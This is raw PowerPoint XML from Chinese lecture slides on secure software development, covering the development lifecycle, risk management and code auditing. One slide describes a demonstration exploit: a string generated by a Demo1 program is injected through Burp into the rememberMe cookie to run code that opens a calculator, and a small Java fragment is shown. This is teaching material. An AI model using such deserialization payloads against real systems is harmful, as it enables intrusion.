            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>            value = byteSource.getBytes();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        return value;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260985" y="1194435"/>
            <a:ext cx="11090275" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>下面演示了执行恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>打开计算器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>的程序源码，运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Demo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>代码之后生成的字符串通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>抓包放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>rememberMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>中</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代码审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>源码分析</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2701925" y="1329690"/>
            <a:ext cx="8228965" cy="5528310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105410" y="1136650"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</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软件安全保障</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558925"/>
            <a:ext cx="9576435" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>贯彻风险管理的思想</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件不必是完美无缺的，但风险必须是可管理的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>树立对软件安全控制的信心，该信心是通过保障活动来获取的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="3023870"/>
            <a:ext cx="10673080" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过在软件开发生命周期各阶段采取必要的、相适应的安全措施来避免绝大多数的安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="爆炸形 1 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000375" y="3486150"/>
            <a:ext cx="6191250" cy="3275965"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采取措施只能有效减少，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但并不能完全杜绝所有</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的安全漏洞！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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软件安全开发生命周期</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426845"/>
            <a:ext cx="9688830" cy="216852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软件安全开发覆盖软件整个生命周期</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需求分析阶段考虑软件的安全需求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在设计阶段设计符合安全准则的功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码阶段保证开发的代码符合安全编码规范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全测试和运行维护确保安全需求、安全设计、安全编码各个环节得以正确有效的实施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="爆炸形 1 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000375" y="3486150"/>
            <a:ext cx="6191250" cy="3275965"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在软件的各个阶段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引入安全措施！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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软件安全问题越早解决成本越低</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513205"/>
            <a:ext cx="9718675" cy="133794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在软件开发生命周期中，后面的阶段改正错误开销比前面的阶段要高出数倍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(国家标准与技术研究所</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>美国的一家联邦机构)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：在软件发布以后进行修复的代价是在软件设计和编码阶段即进行修复所花代价的30倍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994025" y="3025775"/>
            <a:ext cx="5533390" cy="3404235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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目录</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3" name="序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-174274" y="2583974"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-174274" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件安全开发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生命周期</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接连接符 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348465" y="2825952"/>
            <a:ext cx="0" cy="122285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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3141525" y="2825952"/>
            <a:ext cx="0" cy="122285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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4546600" y="2825952"/>
            <a:ext cx="0" cy="122285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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3040371" y="2583974"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3040371" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件安全实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437191" y="2583974"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437191" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1404156" y="2583974"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1404156" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件安全需求及设计</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接连接符 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913300" y="2825952"/>
            <a:ext cx="0" cy="122285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13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7508240" y="2825952"/>
            <a:ext cx="0" cy="122285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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5770871" y="2583974"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
